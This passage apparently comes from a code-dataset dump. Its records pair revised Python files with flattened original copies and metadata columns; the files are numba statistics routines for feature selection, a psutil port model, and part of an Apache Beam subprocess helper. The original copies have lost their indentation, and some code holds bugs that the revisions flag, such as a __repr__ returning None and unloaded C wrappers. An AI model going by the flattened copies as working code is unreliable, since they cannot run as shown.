    s = int(n*(n-1)/2.)
    Edx = np.zeros(n)
    Edy = np.zeros(n)
    DMY = np.zeros(s)
    DMX = np.zeros(s)
    F = np.zeros(s)
    # S1*: weighted sums over pairwise distance products
    # S2*: products of total weighted row sums
    # S3*: weighted sums over row-sum products
    S1 = 0
    S2 = 0
    S3 = 0
    S2a = 0
    S2b = 0
    S1X = 0
    S1Y = 0
    S2X = 0
    S2Y = 0
    S3X = 0
    S3Y = 0
    # k walks the condensed index over the strict upper triangle (i < j)
    k = 0
    for i in range(n-1):
        for j in range(i+1, n):
            # Distance matrices
            DMX[k] = np.fabs(x[i]-x[j])
            DMY[k] = np.fabs(y[i]-y[j])
            F[k] = weights[i]*weights[j]
            S1 += DMX[k]*DMY[k]*F[k]
            S1X += DMX[k]*DMX[k]*F[k]
            S1Y += DMY[k]*DMY[k]*F[k]
            # Accumulate both (i, j) and (j, i) contributions to the row sums
            Edx[i] += DMX[k]*weights[j]
            Edy[j] += DMY[k]*weights[i]
            Edx[j] += DMX[k]*weights[i]
            Edy[i] += DMY[k]*weights[j]
            k += 1
    # Means
    for i in range(n):
        S3 += Edx[i]*Edy[i]*weights[i]
        S2a += Edy[i]*weights[i]
        S2b += Edx[i]*weights[i]
        S3X += Edx[i]*Edx[i]*weights[i]
        S3Y += Edy[i]*Edy[i]*weights[i]
    # Variance and covariance terms; factor 2 restores the full (symmetric)
    # pairwise sums from the upper-triangle-only accumulation above
    S1 = 2*S1
    S1Y = 2*S1Y
    S1X = 2*S1X
    S2 = S2a*S2b
    S2X = S2b*S2b
    S2Y = S2a*S2a
    # Any zero variance term makes the ratio undefined; report 0 instead
    if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
        return 0
    else:
        return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
@njit(cache=True, nogil=True, fastmath=True)
def py_dcor(x, y):
    """Unweighted distance correlation between two 1d arrays.

    Python port of the C function, written with flat condensed distance
    vectors and explicit accumulators so it stays Numba (nopython) friendly.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements

    Returns
    -------
    dcor : float
        Distance correlation; 0 when any variance term degenerates
    """
    n = x.shape[0]
    n_pairs = int(n*(n-1)/2.)
    n2 = n*n
    n3 = n2*n
    n4 = n3*n

    # Row sums of each distance matrix plus the condensed upper-triangle
    # distance vectors
    row_dx = np.zeros(n)
    row_dy = np.zeros(n)
    dist_y = np.zeros(n_pairs)
    dist_x = np.zeros(n_pairs)

    # Accumulators for the covariance/variance building blocks
    cov_xy = 0
    cov_mm = 0
    cov_rr = 0
    sum_ry = 0
    sum_rx = 0
    var_x1 = 0
    var_y1 = 0
    var_x2 = 0
    var_y2 = 0
    var_x3 = 0
    var_y3 = 0

    # idx walks the condensed index over the strict upper triangle (i < j)
    idx = 0
    for i in range(n-1):
        for j in range(i+1, n):
            dist_x[idx] = np.fabs(x[i]-x[j])
            dist_y[idx] = np.fabs(y[i]-y[j])
            cov_xy += dist_x[idx]*dist_y[idx]
            var_x1 += dist_x[idx]*dist_x[idx]
            var_y1 += dist_y[idx]*dist_y[idx]
            # Both (i, j) and (j, i) contribute to the row sums
            row_dx[i] += dist_x[idx]
            row_dy[j] += dist_y[idx]
            row_dx[j] += dist_x[idx]
            row_dy[i] += dist_y[idx]
            idx += 1

    # Totals built from the row sums
    for i in range(n):
        cov_rr += row_dx[i]*row_dy[i]
        sum_ry += row_dy[i]
        sum_rx += row_dx[i]
        var_x3 += row_dx[i]*row_dx[i]
        var_y3 += row_dy[i]*row_dy[i]

    # Normalize each term; the factor 2 restores the full symmetric sums
    # from the upper-triangle-only accumulation above
    cov_xy = (2*cov_xy)/float(n2)
    var_y1 = (2*var_y1)/float(n2)
    var_x1 = (2*var_x1)/float(n2)
    cov_mm = sum_ry*sum_rx/float(n4)
    var_x2 = sum_rx*sum_rx/float(n4)
    var_y2 = sum_ry*sum_ry/float(n4)
    cov_rr /= float(n3)
    var_x3 /= float(n3)
    var_y3 /= float(n3)

    # Any zero variance term makes the ratio undefined; report 0 instead
    if var_x1 == 0 or var_x2 == 0 or var_x3 == 0 or var_y1 == 0 or var_y2 == 0 or var_y3 == 0:
        return 0
    else:
        return np.sqrt( (cov_xy+cov_mm-2*cov_rr) / np.sqrt( (var_x1+var_x2-2*var_x3)*(var_y1+var_y2-2*var_y3) ))
# Lambda function used in approx_wdcor function
MEAN = lambda z: sum(z)/float(len(z))
def approx_wdcor(x, y):
    """Approximate distance correlation by binning arrays.

    NOTE: Code ported from R function approx.dcor at:
        https://rdrr.io/cran/extracat/src/R/wdcor.R

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements

    Returns
    -------
    dcor : float
        Approximate (weighted) distance correlation
    """
    # Equal cuts and then create dataframe
    n = x.shape[0]
    cx = pd.cut(x, n, include_lowest=True)
    cy = pd.cut(y, n, include_lowest=True)
    df = pd.DataFrame(
        np.column_stack([x, y, cx, cy]), columns=['x', 'y', 'cx', 'cy']
    )

    # Average values in each interval
    vx = df['x'].groupby(df['cx'], sort=False).agg(MEAN).values
    vy = df['y'].groupby(df['cy'], sort=False).agg(MEAN).values

    # Joint frequency of each observed (x-bin, y-bin) cell
    f = df[['x', 'y']].groupby([df['cx'], df['cy']], sort=False).size()

    # Normalize frequencies into weights and run weighted distance correlation
    w = f.values/float(f.values.sum())

    # BUG FIX: pandas removed MultiIndex.labels (renamed to .codes), so the
    # old `f.index.labels` raised AttributeError on modern pandas. Also, the
    # c_wdcor fast path for large inputs is unusable because the shared
    # object loading at the top of this module is commented out (calling it
    # raises NameError), so the Python/Numba implementation is always used.
    ix = f.index.codes[0]
    iy = f.index.codes[1]
    return py_wdcor(vx[ix], vy[iy], w)
def c_wdcor(x, y, weights):
    """Wrapper for C version of weighted distance correlation.

    NOTE(review): CFUNC_DCORS_DLL is only defined inside the commented-out
    "CREATE C WRAPPERS" block at the top of this module, so calling this
    function as-is raises NameError -- confirm whether the shared object
    loading is meant to be re-enabled.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements
    weights : 1d array-like
        Weight vector that sums to 1

    Returns
    -------
    dcor : float
        Distance correlation
    """
    n = x.shape[0]
    # ctypes array type holding n C doubles; each Python array is copied
    # into one of these before the call
    array_type = ctypes.c_double*n
    return CFUNC_DCORS_DLL.wdcor(array_type(*x),
                                 array_type(*y),
                                 ctypes.c_int(n),
                                 array_type(*weights))
def c_dcor(x, y):
    """Wrapper for C version of distance correlation.

    NOTE(review): CFUNC_DCORS_DLL is only defined inside the commented-out
    "CREATE C WRAPPERS" block at the top of this module, so calling this
    function as-is raises NameError -- confirm whether the shared object
    loading is meant to be re-enabled.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements

    Returns
    -------
    dcor : float
        Distance correlation
    """
    n = x.shape[0]
    # ctypes array type holding n C doubles; inputs are copied into C arrays
    array_type = ctypes.c_double*n
    return CFUNC_DCORS_DLL.dcor(array_type(*x),
                                array_type(*y),
                                ctypes.c_int(n))
#################################
"""FEATURE SELECTORS: DISCRETE"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mc_fast(x, y, n_classes):
    """Multiple correlation coefficient between a feature and class labels.

    Computed as sqrt(SS_between / SS_total): the square root of the
    fraction of x's variance explained by the class grouping.

    Parameters
    ----------
    x : 1d array-like
        Feature values
    y : 1d array-like
        Integer class labels in [0, n_classes)
    n_classes : int
        Number of classes

    Returns
    -------
    cor : float
        Multiple correlation coefficient between x and y; 0.0 when x is
        constant (zero total variance)
    """
    grand_mean = x.mean()
    deviations = x - grand_mean

    # Total sum of squares; a constant feature carries no information
    ss_total = np.sum(deviations*deviations)
    if ss_total == 0.0:
        return 0.0

    # Between-group sum of squares accumulated class by class
    ss_between = 0.0
    for label in range(n_classes):
        # Grab data for the current class; skip empty classes
        members = x[y == label]
        if members.shape[0] == 0:
            continue
        gap = members.mean() - grand_mean
        ss_between += members.shape[0]*gap*gap

    return np.sqrt(ss_between/ss_total)
def mi(x, y):
    """Mutual information between a feature and discrete labels.

    Thin wrapper over sklearn's mutual_info_classif for a single feature.
    NOTE(review): mutual_info_classif is estimator-based and accepts a
    random_state which is not fixed here, so repeated calls may vary --
    confirm whether determinism matters to callers.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements (discrete labels)

    Returns
    -------
    info : float
        Mutual information between x and y
    """
    # sklearn expects a 2d feature matrix; promote the single feature
    if x.ndim == 1: x = x.reshape(-1, 1)
    return mutual_info_classif(x, y)[0]
###############################
"""SPLIT SELECTORS: DISCRETE"""
###############################
@njit(cache=True, nogil=True, fastmath=True)
def gini_index(y, labels):
    """Gini impurity for a node in the tree: 1 - sum(p_label**2).

    Note: Despite being jitted, this function is still slow and a bottleneck
    in the actual training phase. Sklearn's Cython version is used to
    find the best split and this function is then called on the parent node
    and two child nodes to calculate feature importances using the mean
    decrease impurity formula

    Parameters
    ----------
    y : 1d array-like
        Array of labels
    labels : 1d array-like
        Unique labels

    Returns
    -------
    gini : float
        Gini index; 0.0 for a pure node, approaching 1 for many evenly
        mixed classes
    """
    # Sum of squared class proportions. (Cleanup: dropped the unused local
    # `n = len(y)` and the redundant `if p > 0` guard -- adding 0*0 is a
    # no-op.)
    sum_sq = 0.0
    for label in labels:
        # Proportion of samples carrying this label
        p = np.mean(y == label)
        sum_sq += p*p
    return 1 - sum_sq
#################################
"""SPLIT SELECTORS: CONTINUOUS"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mse(y):
    """Mean squared error (variance around the mean) for a node in the tree.

    Parameters
    ----------
    y : 1d array-like
        Array of target values

    Returns
    -------
    error : float
        Mean squared deviation of y from its mean
    """
    residuals = y - y.mean()
    return np.mean(residuals*residuals)
| 23.085044 | 83 | 0.523565 | from __future__ import absolute_import, division, print_function
import ctypes
from numba import njit
import numpy as np
from os.path import dirname, join
import pandas as pd
from scipy.stats import rankdata as rank
from sklearn.feature_selection import mutual_info_classif
# from externals.six.moves import range
#######################
"""CREATE C WRAPPERS"""
#######################
# Define constants for wrapping C functions
# SHARED_OBJECT_DIR = join(dirname(__file__), 'bin')
# Weighted distance correlation
# CFUNC_DCORS_PATH = join(SHARED_OBJECT_DIR, 'dcor.so')
# CFUNC_DCORS_DLL = ctypes.CDLL(CFUNC_DCORS_PATH)
# CFUNC_DCORS_DLL.wdcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# ctypes.POINTER(ctypes.c_double) # w
# )
# CFUNC_DCORS_DLL.wdcor.restype = ctypes.c_double
# Unweighted distance correlation
# CFUNC_DCORS_DLL.dcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# )
# CFUNC_DCORS_DLL.dcor.restype = ctypes.c_double
###################################
"""FEATURE SELECTORS: CONTINUOUS"""
###################################
@njit(cache=True, nogil=True, fastmath=True)
def pcor(x, y):
"""Pearson correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
cor : float
Pearson correlation
"""
if x.ndim > 1: x = x.ravel()
if y.ndim > 1: y = y.ravel()
# Define variables for looping
n, sx, sy, sx2, sy2, sxy = len(x), 0.0, 0.0, 0.0, 0.0, 0.0
# Loop to calculate statistics
for i in range(n):
xi = x[i]
yi = y[i]
sx += xi
sx2 += xi*xi
sy += yi
sy2 += yi*yi
sxy += xi*yi
# Covariance terms
cov = n*sxy - sx*sy
ssx = n*sx2 - sx*sx
ssy = n*sy2 - sy*sy
# Catch division by zero errors
if ssx == 0.0 or ssy == 0.0:
return 0.0
else:
return cov/np.sqrt(ssx*ssy)
def cca(X, Y):
"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest canonical correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
X = X-X.mean(axis=0)
Y = Y-Y.mean(axis=0)
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return [0.0]
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return [0.0]
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return np.clip(cor[0], 0, 1)
def rdc(X, Y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between X and Y
"""
if X.ndim < 2: X = X.reshape(-1, 1)
if Y.ndim < 2: Y = Y.reshape(-1, 1)
# Shape of random vectors
Xn, Xp = X.shape
Yn, Yp = Y.shape
# X data
X_ones = np.ones((Xn, 1))
X_ = np.array([rank(X[:, j])/float(Xn) for j in range(Xp)]).reshape(Xn, Xp)
X_ = (s/X_.shape[1])*np.column_stack([X_, X_ones])
X_ = X_.dot(np.random.randn(X_.shape[1], k))
# Y data
Y_ones = np.ones((Yn, 1))
Y_ = np.array([rank(Y[:, j])/float(Yn) for j in range(Yp)]).reshape(Yn, Yp)
Y_ = (s/Y_.shape[1])*np.column_stack([Y_, Y_ones])
Y_ = Y_.dot(np.random.randn(Y_.shape[1], k))
# Apply canonical correlation
X_ = np.column_stack([f(X_), X_ones])
Y_ = np.column_stack([f(Y_), Y_ones])
return cca(X_, Y_)
@njit(cache=True, nogil=True, fastmath=True)
def cca_fast(X, Y):
"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
mu_x = np.array([np.mean(X[:, j]) for j in range(Xp)])
mu_y = np.array([np.mean(Y[:, j]) for j in range(Yp)])
X = X-mu_x
Y = Y-mu_y
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return np.array([0.0])
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return np.array([0.0])
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return cor
@njit(cache=True, nogil=True, fastmath=True)
def rdc_fast(x, y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between x and y
"""
# Shape of random vectors
xn = x.shape[0]
yn = y.shape[0]
# X data
x_ones = np.ones((xn, 1))
X_ = np.argsort(x)/float(xn)
X_ = 0.5*s*np.column_stack((X_, x_ones))
X_ = np.dot(X_, np.random.randn(2, k))
# Y data
y_ones = np.ones((yn, 1))
Y_ = np.argsort(y)/float(yn)
Y_ = 0.5*s*np.column_stack((Y_, y_ones))
Y_ = np.dot(Y_, np.random.randn(2, k))
# Apply canonical correlation
X_ = np.column_stack((f(X_), x_ones))
Y_ = np.column_stack((f(Y_), y_ones))
cor = cca_fast(X_, Y_)[0]
if cor < 0.0:
return 0.0
elif cor > 1.0:
return 1.0
else:
return cor
@njit(cache=True, nogil=True, fastmath=True)
def py_wdcor(x, y, weights):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
# Define initial variables
n = x.shape[0]
s = int(n*(n-1)/2.)
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
F = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
F[k] = weights[i]*weights[j]
S1 += DMX[k]*DMY[k]*F[k]
S1X += DMX[k]*DMX[k]*F[k]
S1Y += DMY[k]*DMY[k]*F[k]
Edx[i] += DMX[k]*weights[j]
Edy[j] += DMY[k]*weights[i]
Edx[j] += DMX[k]*weights[i]
Edy[i] += DMY[k]*weights[j]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]*weights[i]
S2a += Edy[i]*weights[i]
S2b += Edx[i]*weights[i]
S3X += Edx[i]*Edx[i]*weights[i]
S3Y += Edy[i]*Edy[i]*weights[i]
# Variance and covariance terms
S1 = 2*S1
S1Y = 2*S1Y
S1X = 2*S1X
S2 = S2a*S2b
S2X = S2b*S2b
S2Y = S2a*S2a
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
@njit(cache=True, nogil=True, fastmath=True)
def py_dcor(x, y):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
s = int(n*(n-1)/2.)
n2 = n*n
n3 = n2*n
n4 = n3*n
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
S1 += DMX[k]*DMY[k]
S1X += DMX[k]*DMX[k]
S1Y += DMY[k]*DMY[k]
Edx[i] += DMX[k]
Edy[j] += DMY[k]
Edx[j] += DMX[k]
Edy[i] += DMY[k]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]
S2a += Edy[i]
S2b += Edx[i]
S3X += Edx[i]*Edx[i]
S3Y += Edy[i]*Edy[i]
# Variance and covariance terms
S1 = (2*S1)/float(n2)
S1Y = (2*S1Y)/float(n2)
S1X = (2*S1X)/float(n2)
S2 = S2a*S2b/float(n4)
S2X = S2b*S2b/float(n4)
S2Y = S2a*S2a/float(n4)
S3 /= float(n3)
S3X /= float(n3)
S3Y /= float(n3)
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
# Lambda function used in approx_wdcor function
MEAN = lambda z: sum(z)/float(len(z))
def approx_wdcor(x, y):
"""Approximate distance correlation by binning arrays
NOTE: Code ported from R function approx.dcor at:
https://rdrr.io/cran/extracat/src/R/wdcor.R
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
# Equal cuts and then create dataframe
n = x.shape[0]
cx = pd.cut(x, n, include_lowest=True)
cy = pd.cut(y, n, include_lowest=True)
df = pd.DataFrame(
np.column_stack([x, y, cx, cy]), columns=['x', 'y', 'cx', 'cy']
)
# Average values in interval
vx = df['x'].groupby(df['cx'], sort=False).agg(MEAN).values
vy = df['y'].groupby(df['cy'], sort=False).agg(MEAN).values
# Calculate frequencies based on groupings
f = df[['x', 'y']].groupby([df['cx'], df['cy']], sort=False).size()
# Normalize weights and calculate weighted distance correlation
w = f.values/float(f.values.sum())
# Recompute n
n = len(w)
# Call either the Python or C version based on array length
if n > 5000:
return c_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
else:
return py_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
def c_wdcor(x, y, weights):
"""Wrapper for C version of weighted distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.wdcor(array_type(*x),
array_type(*y),
ctypes.c_int(n),
array_type(*weights))
def c_dcor(x, y):
"""Wrapper for C version of distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.dcor(array_type(*x),
array_type(*y),
ctypes.c_int(n))
#################################
"""FEATURE SELECTORS: DISCRETE"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mc_fast(x, y, n_classes):
"""Multiple correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
n_classes : int
Number of classes
Returns
-------
cor : float
Multiple correlation coefficient between x and y
"""
ssb, mu = 0.0, x.mean()
# Sum of squares total
sst = np.sum((x-mu)*(x-mu))
if sst == 0.0: return 0.0
for j in range(n_classes):
# Grab data for current class and if empty skip
group = x[y==j]
if group.shape[0] == 0: continue
# Sum of squares between
mu_j = group.mean()
n_j = group.shape[0]
ssb += n_j*(mu_j-mu)*(mu_j-mu)
return np.sqrt(ssb/sst)
def mi(x, y):
"""Mutual information
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
info : float
Mutual information between x and y
"""
if x.ndim == 1: x = x.reshape(-1, 1)
return mutual_info_classif(x, y)[0]
###############################
"""SPLIT SELECTORS: DISCRETE"""
###############################
@njit(cache=True, nogil=True, fastmath=True)
def gini_index(y, labels):
"""Gini index for node in tree
Note: Despite being jitted, this function is still slow and a bottleneck
in the actual training phase. Sklearn's Cython version is used to
find the best split and this function is then called on the parent node
and two child nodes to calculate feature importances using the mean
decrease impurity formula
Parameters
----------
y : 1d array-like
Array of labels
labels : 1d array-like
Unique labels
Returns
-------
gini : float
Gini index
"""
# Gini index for each label
n, gini = len(y), 0.0
for label in labels:
# Proportion of each label
p = np.mean(y == label)
# Only square if greater than 0
if p > 0: gini += p*p
# Gini index
return 1 - gini
#################################
"""SPLIT SELECTORS: CONTINUOUS"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mse(y):
"""Mean squared error for node in tree
Parameters
----------
y : 1d array-like
Array of labels
Returns
-------
error : float
Mean squared error
"""
mu = y.mean()
return np.mean((y-mu)*(y-mu))
| 0 | 0 | 0 |
1c67f80426cccc03d5222dfecfea87a636eddca5 | 1,044 | py | Python | models.py | ServerChef/serverchef-system-helpers | fee45b06902d0887767fb430ade31af8052f4ff3 | [
"MIT"
] | null | null | null | models.py | ServerChef/serverchef-system-helpers | fee45b06902d0887767fb430ade31af8052f4ff3 | [
"MIT"
] | null | null | null | models.py | ServerChef/serverchef-system-helpers | fee45b06902d0887767fb430ade31af8052f4ff3 | [
"MIT"
] | null | null | null | import json
import psutil
# BUG FIX: 'Use' does not name any object in this module (the class is
# UsedPort), so `from models import *` raised AttributeError.
__all__ = ['SystemdUnitStatus', 'UsedPort']
| 22.695652 | 70 | 0.599617 | import json
import psutil
# BUG FIX: 'Use' does not name any object in this module (the class is
# UsedPort), so `from models import *` raised AttributeError.
__all__ = ['SystemdUnitStatus', 'UsedPort']
class BaseModel(object):
    """Lightweight base class whose public attributes map to/from a dict.

    Subclasses declare their fields as class attributes; the constructor
    accepts them as keyword arguments and silently ignores unknown keys.
    """

    def __init__(self, **kwargs):
        """Set any known field passed as a keyword argument; ignore the rest."""
        keys = self.get_keys()
        for kwarg, value in kwargs.items():
            if kwarg in keys:
                setattr(self, kwarg, value)

    def get_keys(self):
        """Return the names of all public, non-callable attributes."""
        return [name for name in dir(self) if
                not name.startswith('__')
                and not callable(getattr(self, name))]

    def to_dict(self):
        """Return a dict mapping the model's public attribute names to values."""
        return {name: getattr(self, name) for name in self.get_keys()}

    def __repr__(self):
        # BUG FIX: the previous implementation *printed* the JSON and
        # implicitly returned None; __repr__ must return a string, so
        # repr()/interactive display raised TypeError.
        return json.dumps(self.to_dict())
class SystemdUnitStatus(BaseModel):
    """Status of a systemd unit; class attributes are the field defaults."""
    active = True  # whether the unit is considered active
    status = "active"  # unit state string (default "active")
class UsedPort(BaseModel):
    """A network port in use, with details of the owning process."""
    port = 0  # local port number
    program_name = "/dev/null"  # name of the owning process
    pid = 10  # process id of the owner
    protocol = "tcp6"  # protocol label; NOTE(review): never set by from_ps_util_sconn -- confirm intended
    bind_address = "0.0.0.0"  # local address the port is bound on

    @classmethod
    def from_ps_util_sconn(cls, conn):
        """Build a UsedPort from a psutil connection (sconn) entry.

        NOTE(review): assumes conn.laddr unpacks as (address, port) and that
        conn.pid refers to a live process (psutil.Process raises otherwise)
        -- confirm against callers.
        """
        ret = cls()
        ret.program_name = psutil.Process(conn.pid).name()
        ret.bind_address, ret.port = conn.laddr
        ret.pid = conn.pid
        return ret
| 586 | 214 | 176 |
ab587aac8ba41bf3e5ff1adc3b5bef4b37c4a250 | 3,911 | py | Python | sdks/python/apache_beam/utils/processes.py | eyal0/beam | 9c6922976cc2a5c6a2ef836c1986ff769cda99a5 | [
"Apache-2.0"
] | 3 | 2020-08-28T17:47:26.000Z | 2021-08-17T06:38:58.000Z | sdks/python/apache_beam/utils/processes.py | eyal0/beam | 9c6922976cc2a5c6a2ef836c1986ff769cda99a5 | [
"Apache-2.0"
] | 80 | 2020-01-16T09:55:09.000Z | 2020-10-03T13:43:07.000Z | sdks/python/apache_beam/utils/processes.py | eyal0/beam | 9c6922976cc2a5c6a2ef836c1986ff769cda99a5 | [
"Apache-2.0"
] | 1 | 2020-03-24T08:34:38.000Z | 2020-03-24T08:34:38.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Cross-platform utilities for creating subprocesses.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import platform
import subprocess
import traceback
from typing import TYPE_CHECKING
# On Windows, we need to use shell=True when creating subprocesses for binary
# paths to be resolved correctly.
force_shell = platform.system() == 'Windows'
# We mimic the interface of the standard Python subprocess module.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
CalledProcessError = subprocess.CalledProcessError
if TYPE_CHECKING:
call = subprocess.call
check_call = subprocess.check_call
check_output = subprocess.check_output
Popen = subprocess.Popen
else:
| 35.554545 | 77 | 0.676042 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Cross-platform utilities for creating subprocesses.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import platform
import subprocess
import traceback
from typing import TYPE_CHECKING
# On Windows, we need to use shell=True when creating subprocesses for binary
# paths to be resolved correctly.
force_shell = platform.system() == 'Windows'

# We mimic the interface of the standard Python subprocess module.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
CalledProcessError = subprocess.CalledProcessError

if TYPE_CHECKING:
  # For the type checker the wrappers are interchangeable with the originals.
  call = subprocess.call
  check_call = subprocess.check_call
  check_output = subprocess.check_output
  Popen = subprocess.Popen
else:

  def call(*args, **kwargs):
    """subprocess.call, with shell=True forced on Windows.

    Raises RuntimeError (instead of OSError) when the executable cannot be
    found; otherwise returns the child's exit code.
    """
    if force_shell:
      kwargs['shell'] = True
    try:
      out = subprocess.call(*args, **kwargs)
    except OSError:
      raise RuntimeError("Executable {} not found".format(args[0]))
    # BUG FIX: a CalledProcessError handler was removed here. Unlike
    # check_call/check_output, subprocess.call reports failure through its
    # return code and never raises CalledProcessError, so that handler was
    # unreachable dead code.
    return out

  def check_call(*args, **kwargs):
    """subprocess.check_call, with shell=True forced on Windows.

    A missing executable or a non-zero exit status is re-raised as
